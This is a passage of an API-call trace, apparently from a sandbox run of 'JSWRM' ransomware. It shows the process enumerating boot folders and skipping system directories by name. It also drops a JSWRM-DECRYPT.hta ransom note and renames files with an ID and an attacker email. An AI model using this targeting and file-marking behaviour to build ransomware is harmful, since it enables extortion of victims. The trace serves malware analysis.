(HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0063.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0063.731] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ca39084, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1ca39084, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1ca5f2b5, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0063.731] FindClose (in: hFindFile=0x232180 | out: hFindFile=0x232180) returned 1 [0063.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0063.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0063.731] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef57d0f5, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="en-US", cAlternateFileName="")) returned 1 [0063.731] lstrcmpiW (lpString1="en-US", lpString2=".") returned 1 [0063.731] lstrcmpiW (lpString1="en-US", lpString2="..") returned 1 [0063.731] lstrcmpiW (lpString1="en-US", lpString2="...") returned 1 [0063.731] lstrcmpiW (lpString1="en-US", lpString2="windows") returned -1 [0063.731] lstrcmpiW (lpString1="en-US", lpString2="recovery") returned -1 [0063.731] lstrcmpiW (lpString1="en-US", lpString2="perflogs") returned -1 [0063.731] lstrcmpiW (lpString1="en-US", lpString2="documents and settings") returned 1 [0063.731] lstrcmpiW (lpString1="en-US", lpString2="$RECYCLE.BIN") returned 1 [0063.731] lstrcmpiW (lpString1="en-US", lpString2="system volume information") returned -1 [0063.731] lstrcmpiW (lpString1="en-US", lpString2="msocache") returned -1 [0063.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0063.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0063.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0063.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x2373a8 [0063.731] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.731] GetFileAttributesW (lpFileName="C:\\Boot\\en-US\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\en-us\\jswrm-decrypt.hta")) returned 0xffffffff [0063.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2373a8 | out: hHeap=0x1e0000) returned 1 [0063.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0063.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0063.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0063.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0063.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0063.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236f48 [0063.732] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.732] CreateFileW (lpFileName="C:\\Boot\\en-US\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\en-us\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0063.750] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0063.750] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0063.751] CloseHandle (hObject=0x450) returned 1 [0063.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236f48 | out: hHeap=0x1e0000) returned 1 [0063.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0063.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0063.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0063.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0063.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237178 [0063.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.752] GetFileAttributesW (lpFileName="C:\\Boot\\en-US\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\en-us\\jswrm-decrypt.hta")) returned 0x20 [0063.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237178 | out: hHeap=0x1e0000) returned 1 [0063.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0063.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.752] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x1ca852fb, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x232100 [0063.752] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.752] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x1ca852fb, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0063.753] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.753] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.753] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef569843, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x327294d0, ftLastWriteTime.dwHighDateTime=0x1d2a030, nFileSizeHigh=0x0, nFileSizeLow=0x121a0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0063.753] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0063.753] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0063.753] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0063.753] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0063.753] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="recovery") returned -1 [0063.753] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="perflogs") returned -1 [0063.753] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="documents and settings") returned -1 [0063.753] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0063.753] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="system volume information") returned -1 [0063.753] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="msocache") returned -1 [0063.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0063.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0063.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0063.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0063.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.753] CreateFileW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.754] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9256135561372696) returned 0 [0063.754] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.755] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.755] CloseHandle (hObject=0xffffffff) returned 1 [0063.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0063.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0063.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c488 [0063.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2268b0 [0063.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c488 | out: hHeap=0x1e0000) returned 1 [0063.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0063.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2268b0 | out: hHeap=0x1e0000) returned 1 [0063.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.768] MoveFileW (lpExistingFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\en-US\\bootmgr.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0063.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.768] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ca852fb, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1ca852fb, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1ca852fb, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0063.768] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0063.768] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0063.768] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0063.768] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0063.768] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0063.768] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0063.768] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0063.768] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0063.768] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0063.768] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0063.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0063.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0063.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0063.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241038, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0063.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0063.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0063.769] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xafa0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0063.769] lstrcmpiW (lpString1="memtest.exe.mui", lpString2=".") returned 1 [0063.769] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="..") returned 1 [0063.769] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="...") returned 1 [0063.769] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="windows") returned -1 [0063.769] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="recovery") returned -1 [0063.769] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="perflogs") returned -1 [0063.769] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="documents and settings") returned 1 [0063.769] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0063.769] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="system volume information") returned -1 [0063.769] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="msocache") returned -1 [0063.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0063.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0063.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0063.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0063.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.769] CreateFileW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.769] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9256135561372696) returned 0 [0063.769] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.769] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.770] CloseHandle (hObject=0xffffffff) returned 1 [0063.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0063.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: 